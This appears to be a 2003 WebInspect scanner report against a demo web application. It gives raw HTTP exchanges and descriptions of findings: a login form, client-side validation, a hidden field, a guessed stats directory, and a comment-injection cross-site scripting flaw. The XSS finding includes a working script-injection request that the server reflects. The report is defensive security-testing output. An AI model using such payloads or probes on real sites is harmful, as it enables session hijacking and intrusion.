<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please provide us with the following details</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Login FormA possible login form was found.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/login.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
type=['"]?password['"]?GET /stats/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:04 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4269
Content-Type: text/html
Cache-control: private
<html>
<body topmargin=0 leftmargin=0 rightmargin=0 marginwidth=0 marginheight=0>
<table bgcolor="white" border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td bgcolor="#3399FF" align="right" height=10 valign="middle" width="100%" colspan="3">
</td>
</tr>
<tr>
<td align="center" width="30%">
</td>
<td valign="middle"><img height="70" width="150"src="http://form-engine.com/images/fade.gif"></td>
<td align="left" valign="middle" bgcolor="#cc0000" width="70%" valign="bottom">
<font face="Arial Black" color="#FFFFFF" size="6">Statistics </font>
</td>
</tr>
<tr height="1">
<td align="right" width="100%" height="10" bgcolor="#3399FF" colspan="3">
</td>
</tr>
</table>
<script language="Javascript">
<!--
function check()
{
if (document.login.email.value=="")
{
alert("Email Address is empty!");
return false;
}
if (document.login.password.value=="")
{
alert("Password is empty!");
return false;
}
}
//-->
</script>
<p><br></p>
<form method="POST" action="login1.asp" onsubmit="return check()" name="login">
<div align="center">
<center>
<table border="0" cellpadding="0" cellspacing="0" width="347" height="247">
<tr bgcolor="#000000">
<td valign="top" align="left" height="25" width="11"><img border="0" src="http://asiadepot.com/images/pink1.gif" width="9" height="9"></td>
<td valign="top" align="center" colspan="2" height="25" width="321">
<p align="center"><font color="#FFFFFF" face="Arial Black">Login</font></td>
<td valign="top" align="right" height="25" width="9"><img border="0" src="http://asiadepot.com/images/pink2.gif" width="9" height="9"></td>
</tr>
<tr>
<td colspan="4" bgcolor="#BDD6FF" align="center" height="30" width="343"><font face="arial, helvetica, sansserif" size="1">To log
on to the statistics page.<br>
Please type your name and password below.</font></td>
</tr>
<tr bgcolor="#BDD6FF">
<td height="25" width="11"> </td>
<td valign="middle" align="right" height="25" width="119">
<b>
<font face="arial,helvetica,sans-serif" size="1">Username: </font></b>
</td>
<td valign="top" align="left" height="25" width="200">
<input type="text" size="19" maxlength="32" value="" name="email"></td>
<td height="25" width="9"> </td>
</tr>
<tr bgcolor="#BDD6FF">
<td height="25" width="11"> </td>
<td valign="middle" align="right" height="25" width="119">
<font face="arial,helvetica,sans-serif" size="1"> <b> Password: </b>
</font>
</td>
<td valign="top" align="left" height="25" width="200">
<input type="password" size="19" maxlength="16" value="" name="password">
</td>
<td height="25" width="9"> </td>
</tr>
<tr bgcolor="#BDD6FF">
<td align="center" height="30" colspan="4" width="343"><input type="image" src="/images/log_me_blue_btn.gif" name="Login" width="96" height="26" border="0"></td>
</tr>
<tr bgcolor="#BDD6FF">
<td align="center" height="16" colspan="4" width="343"><font face="Tahoma, Arial, Helvetica, sans-serif" size="1">
</font></td>
</tr>
<tr bgcolor="#BDD6FF">
<td align="center" height="16" colspan="4" width="343"><font face="Tahoma, Arial, Helvetica, sans-serif" size="1">
</font></td>
</tr>
<tr bgcolor="#BDD6FF">
<td valign="bottom" align="left" height="21" width="11"><font size="1"><img border="0" src="http://asiadepot.com/images/pink3.gif" width="9" height="9"></font></td>
<td height="21" colspan="2" width="321"> </td>
<td valign="bottom" align="right" height="21" width="9"><font size="1"><img border="0" src="http://asiadepot.com/images/pink4.gif" width="9" height="9"></font></td>
</tr>
<input type=hidden name=gotopage value="">
</table>
</center>
</div>
</form>
<hr size=1><p align=center>
<FONT face="Arial, Geneva, Helvetica" size=2><a href="http://www.freebank.com">Copyright</a> 1999-2002
www.freebank.com. All rights reserved
<br><br>
Powered by <a href="http://frontsql.com">FrontSQL</a>
</font>
</p>Possible Client-Side Input ValidationA form that calls client-side scripts when data is changed or submitted was found. This is an indication that client-side input validation may be in use. Input validation is the process of taking untrusted and potentially malicious client-supplied data and ensuring that it can be used by the application. Common input validation tasks are limiting the amount of data sent and removing special characters (such as semicolons and pipes) that are known to cause problems. Other tasks may be purpose-specific. For instance, if the application expects the user to be sending it a standard US zip code, it would be neccessary to ensure that the data being sent is exclusively numeric and does not exceed five characters. If the application tried to manipulate or use the data without checking its integrity, it could cause problems.<br><br>
Many developers attempt to include input validation within the client application (like a web browser). This is a security risk because all actions that are performed on the client can be controlled by the user. In the case of input-validation using script code, it is trivial to bypass these devices and send arbitrary data to the server. For this reason, it is essential that input validation be performed on the server.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /stats/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:04 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4269
Content-Type: text/html
Cache-control: private
<html>
<body topmargin=0 leftmargin=0 rightmargin=0 marginwidth=0 marginheight=0>
<table bgcolor="white" border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td bgcolor="#3399FF" align="right" height=10 valign="middle" width="100%" colspan="3">
</td>
</tr>
<tr>
<td align="center" width="30%">
</td>
<td valign="middle"><img height="70" width="150"src="http://form-engine.com/images/fade.gif"></td>
<td align="left" valign="middle" bgcolor="#cc0000" width="70%" valign="bottom">
<font face="Arial Black" color="#FFFFFF" size="6">Statistics </font>
</td>
</tr>
<tr height="1">
<td align="right" width="100%" height="10" bgcolor="#3399FF" colspan="3">
</td>
</tr>
</table>
<script language="Javascript">
<!--
function check()
{
if (document.login.email.value=="")
{
alert("Email Address is empty!");
return false;
}
if (document.login.password.value=="")
{
alert("Password is empty!");
return false;
}
}
//-->
</script>
<p><br></p>
<form method="POST" action="login1.asp" onsubmit="return check()" name="login">
<div align="center">
<center>
<table border="0" cellpadding="0" cellspacing="0" width="347" height="247">
<tr bgcolor="#000000">
<td valign="top" align="left" height="25" width="11"><img border="0" src="http://asiadepot.com/images/pink1.gif" width="9" height="9"></td>
<td valign="top" align="center" colspan="2" height="25" width="321">
<p align="center"><font color="#FFFFFF" face="Arial Black">Login</font></td>
<td valign="top" align="right" height="25" width="9"><img border="0" src="http://asiadepot.com/images/pink2.gif" width="9" height="9"></td>
</tr>
<tr>
<td colspan="4" bgcolor="#BDD6FF" align="center" height="30" width="343"><font face="arial, helvetica, sansserif" size="1">To log
on to the statistics page.<br>
Please type your name and password below.</font></td>
</tr>
<tr bgcolor="#BDD6FF">
<td height="25" width="11"> </td>
<td valign="middle" align="right" height="25" width="119">
<b>
<font face="arial,helvetica,sans-serif" size="1">Username: </font></b>
</td>
<td valign="top" align="left" height="25" width="200">
<input type="text" size="19" maxlength="32" value="" name="email"></td>
<td height="25" width="9"> </td>
</tr>
<tr bgcolor="#BDD6FF">
<td height="25" width="11"> </td>
<td valign="middle" align="right" height="25" width="119">
<font face="arial,helvetica,sans-serif" size="1"> <b> Password: </b>
</font>
</td>
<td valign="top" align="left" height="25" width="200">
<input type="password" size="19" maxlength="16" value="" name="password">
</td>
<td height="25" width="9"> </td>
</tr>
<tr bgcolor="#BDD6FF">
<td align="center" height="30" colspan="4" width="343"><input type="image" src="/images/log_me_blue_btn.gif" name="Login" width="96" height="26" border="0"></td>
</tr>
<tr bgcolor="#BDD6FF">
<td align="center" height="16" colspan="4" width="343"><font face="Tahoma, Arial, Helvetica, sans-serif" size="1">
</font></td>
</tr>
<tr bgcolor="#BDD6FF">
<td align="center" height="16" colspan="4" width="343"><font face="Tahoma, Arial, Helvetica, sans-serif" size="1">
</font></td>
</tr>
<tr bgcolor="#BDD6FF">
<td valign="bottom" align="left" height="21" width="11"><font size="1"><img border="0" src="http://asiadepot.com/images/pink3.gif" width="9" height="9"></font></td>
<td height="21" colspan="2" width="321"> </td>
<td valign="bottom" align="right" height="21" width="9"><font size="1"><img border="0" src="http://asiadepot.com/images/pink4.gif" width="9" height="9"></font></td>
</tr>
<input type=hidden name=gotopage value="">
</table>
</center>
</div>
</form>
<hr size=1><p align=center>
<FONT face="Arial, Geneva, Helvetica" size=2><a href="http://www.freebank.com">Copyright</a> 1999-2002
www.freebank.com. All rights reserved
<br><br>
Powered by <a href="http://frontsql.com">FrontSQL</a>
</font>
</p>Hidden Form ValueThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires that hidden form fields are checked. Webinspect has detected that the URL <B> ~FullURL~ </b>has failed this policy.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /stats/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:04 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4269
Content-Type: text/html
Cache-control: private
<html>
<body topmargin=0 leftmargin=0 rightmargin=0 marginwidth=0 marginheight=0>
<table bgcolor="white" border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td bgcolor="#3399FF" align="right" height=10 valign="middle" width="100%" colspan="3">
</td>
</tr>
<tr>
<td align="center" width="30%">
</td>
<td valign="middle"><img height="70" width="150"src="http://form-engine.com/images/fade.gif"></td>
<td align="left" valign="middle" bgcolor="#cc0000" width="70%" valign="bottom">
<font face="Arial Black" color="#FFFFFF" size="6">Statistics </font>
</td>
</tr>
<tr height="1">
<td align="right" width="100%" height="10" bgcolor="#3399FF" colspan="3">
</td>
</tr>
</table>
<script language="Javascript">
<!--
function check()
{
if (document.login.email.value=="")
{
alert("Email Address is empty!");
return false;
}
if (document.login.password.value=="")
{
alert("Password is empty!");
return false;
}
}
//-->
</script>
<p><br></p>
<form method="POST" action="login1.asp" onsubmit="return check()" name="login">
<div align="center">
<center>
<table border="0" cellpadding="0" cellspacing="0" width="347" height="247">
<tr bgcolor="#000000">
<td valign="top" align="left" height="25" width="11"><img border="0" src="http://asiadepot.com/images/pink1.gif" width="9" height="9"></td>
<td valign="top" align="center" colspan="2" height="25" width="321">
<p align="center"><font color="#FFFFFF" face="Arial Black">Login</font></td>
<td valign="top" align="right" height="25" width="9"><img border="0" src="http://asiadepot.com/images/pink2.gif" width="9" height="9"></td>
</tr>
<tr>
<td colspan="4" bgcolor="#BDD6FF" align="center" height="30" width="343"><font face="arial, helvetica, sansserif" size="1">To log
on to the statistics page.<br>
Please type your name and password below.</font></td>
</tr>
<tr bgcolor="#BDD6FF">
<td height="25" width="11"> </td>
<td valign="middle" align="right" height="25" width="119">
<b>
<font face="arial,helvetica,sans-serif" size="1">Username: </font></b>
</td>
<td valign="top" align="left" height="25" width="200">
<input type="text" size="19" maxlength="32" value="" name="email"></td>
<td height="25" width="9"> </td>
</tr>
<tr bgcolor="#BDD6FF">
<td height="25" width="11"> </td>
<td valign="middle" align="right" height="25" width="119">
<font face="arial,helvetica,sans-serif" size="1"> <b> Password: </b>
</font>
</td>
<td valign="top" align="left" height="25" width="200">
<input type="password" size="19" maxlength="16" value="" name="password">
</td>
<td height="25" width="9"> </td>
</tr>
<tr bgcolor="#BDD6FF">
<td align="center" height="30" colspan="4" width="343"><input type="image" src="/images/log_me_blue_btn.gif" name="Login" width="96" height="26" border="0"></td>
</tr>
<tr bgcolor="#BDD6FF">
<td align="center" height="16" colspan="4" width="343"><font face="Tahoma, Arial, Helvetica, sans-serif" size="1">
</font></td>
</tr>
<tr bgcolor="#BDD6FF">
<td align="center" height="16" colspan="4" width="343"><font face="Tahoma, Arial, Helvetica, sans-serif" size="1">
</font></td>
</tr>
<tr bgcolor="#BDD6FF">
<td valign="bottom" align="left" height="21" width="11"><font size="1"><img border="0" src="http://asiadepot.com/images/pink3.gif" width="9" height="9"></font></td>
<td height="21" colspan="2" width="321"> </td>
<td valign="bottom" align="right" height="21" width="9"><font size="1"><img border="0" src="http://asiadepot.com/images/pink4.gif" width="9" height="9"></font></td>
</tr>
<input type=hidden name=gotopage value="">
</table>
</center>
</div>
</form>
<hr size=1><p align=center>
<FONT face="Arial, Geneva, Helvetica" size=2><a href="http://www.freebank.com">Copyright</a> 1999-2002
www.freebank.com. All rights reserved
<br><br>
Powered by <a href="http://frontsql.com">FrontSQL</a>
</font>
</p>Directory (stats)Guessed Directory<BR>A statistics directory was found.
This allows attackers to view any statistics such as "most referenced files" or "least referenced files." This gives valuable data. An attacker can find out
whether you administer a site through a specific URL or where old files are
located.Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing Apache - Access Control</A>
<BR><BR><B>IIS:</B><BR><A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS Standard Permissions on Your Web Site</A>
<BR> <BR><B>Netscape:</B><BR><A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR><B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /stats/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:04 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4269
Content-Type: text/html
Cache-control: private
<html>
<body topmargin=0 leftmargin=0 rightmargin=0 marginwidth=0 marginheight=0>
<table bgcolor="white" border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td bgcolor="#3399FF" align="right" height=10 valign="middle" width="100%" colspan="3">
</td>
</tr>
<tr>
<td align="center" width="30%">
</td>
<td valign="middle"><img height="70" width="150"src="http://form-engine.com/images/fade.gif"></td>
<td align="left" valign="middle" bgcolor="#cc0000" width="70%" valign="bottom">
<font face="Arial Black" color="#FFFFFF" size="6">Statistics </font>
</td>
</tr>
<tr height="1">
<td align="right" width="100%" height="10" bgcolor="#3399FF" colspan="3">
</td>
</tr>
</table>
<script language="Javascript">
<!--
function check()
{
if (document.login.email.value=="")
{
alert("Email Address is empty!");
return false;
}
if (document.login.password.value=="")
{
alert("Password is empty!");
return false;
}
}
//-->
</script>
<p><br></p>
<form method="POST" action="login1.asp" onsubmit="return check()" name="login">
<div align="center">
<center>
<table border="0" cellpadding="0" cellspacing="0" width="347" height="247">
<tr bgcolor="#000000">
<td valign="top" align="left" height="25" width="11"><img border="0" src="http://asiadepot.com/images/pink1.gif" width="9" height="9"></td>
<td valign="top" align="center" colspan="2" height="25" width="321">
<p align="center"><font color="#FFFFFF" face="Arial Black">Login</font></td>
<td valign="top" align="right" height="25" width="9"><img border="0" src="http://asiadepot.com/images/pink2.gif" width="9" height="9"></td>
</tr>
<tr>
<td colspan="4" bgcolor="#BDD6FF" align="center" height="30" width="343"><font face="arial, helvetica, sansserif" size="1">To log
on to the statistics page.<br>
Please type your name and password below.</font></td>
</tr>
<tr bgcolor="#BDD6FF">
<td height="25" width="11"> </td>
<td valign="middle" align="right" height="25" width="119">
<b>
<font face="arial,helvetica,sans-serif" size="1">Username: </font></b>
</td>
<td valign="top" align="left" height="25" width="200">
<input type="text" size="19" maxlength="32" value="" name="email"></td>
<td height="25" width="9"> </td>
</tr>
<tr bgcolor="#BDD6FF">
<td height="25" width="11"> </td>
<td valign="middle" align="right" height="25" width="119">
<font face="arial,helvetica,sans-serif" size="1"> <b> Password: </b>
</font>
</td>
<td valign="top" align="left" height="25" width="200">
<input type="password" size="19" maxlength="16" value="" name="password">
</td>
<td height="25" width="9"> </td>
</tr>
<tr bgcolor="#BDD6FF">
<td align="center" height="30" colspan="4" width="343"><input type="image" src="/images/log_me_blue_btn.gif" name="Login" width="96" height="26" border="0"></td>
</tr>
<tr bgcolor="#BDD6FF">
<td align="center" height="16" colspan="4" width="343"><font face="Tahoma, Arial, Helvetica, sans-serif" size="1">
</font></td>
</tr>
<tr bgcolor="#BDD6FF">
<td align="center" height="16" colspan="4" width="343"><font face="Tahoma, Arial, Helvetica, sans-serif" size="1">
</font></td>
</tr>
<tr bgcolor="#BDD6FF">
<td valign="bottom" align="left" height="21" width="11"><font size="1"><img border="0" src="http://asiadepot.com/images/pink3.gif" width="9" height="9"></font></td>
<td height="21" colspan="2" width="321"> </td>
<td valign="bottom" align="right" height="21" width="9"><font size="1"><img border="0" src="http://asiadepot.com/images/pink4.gif" width="9" height="9"></font></td>
</tr>
<input type=hidden name=gotopage value="">
</table>
</center>
</div>
</form>
<hr size=1><p align=center>
<FONT face="Arial, Geneva, Helvetica" size=2><a href="http://www.freebank.com">Copyright</a> 1999-2002
www.freebank.com. All rights reserved
<br><br>
Powered by <a href="http://frontsql.com">FrontSQL</a>
</font>
</p>Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /join.asp?name=--><script>alert('XSS')</script>&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:42 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=<attack>--><script>alert('XSS')</script></attack>&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
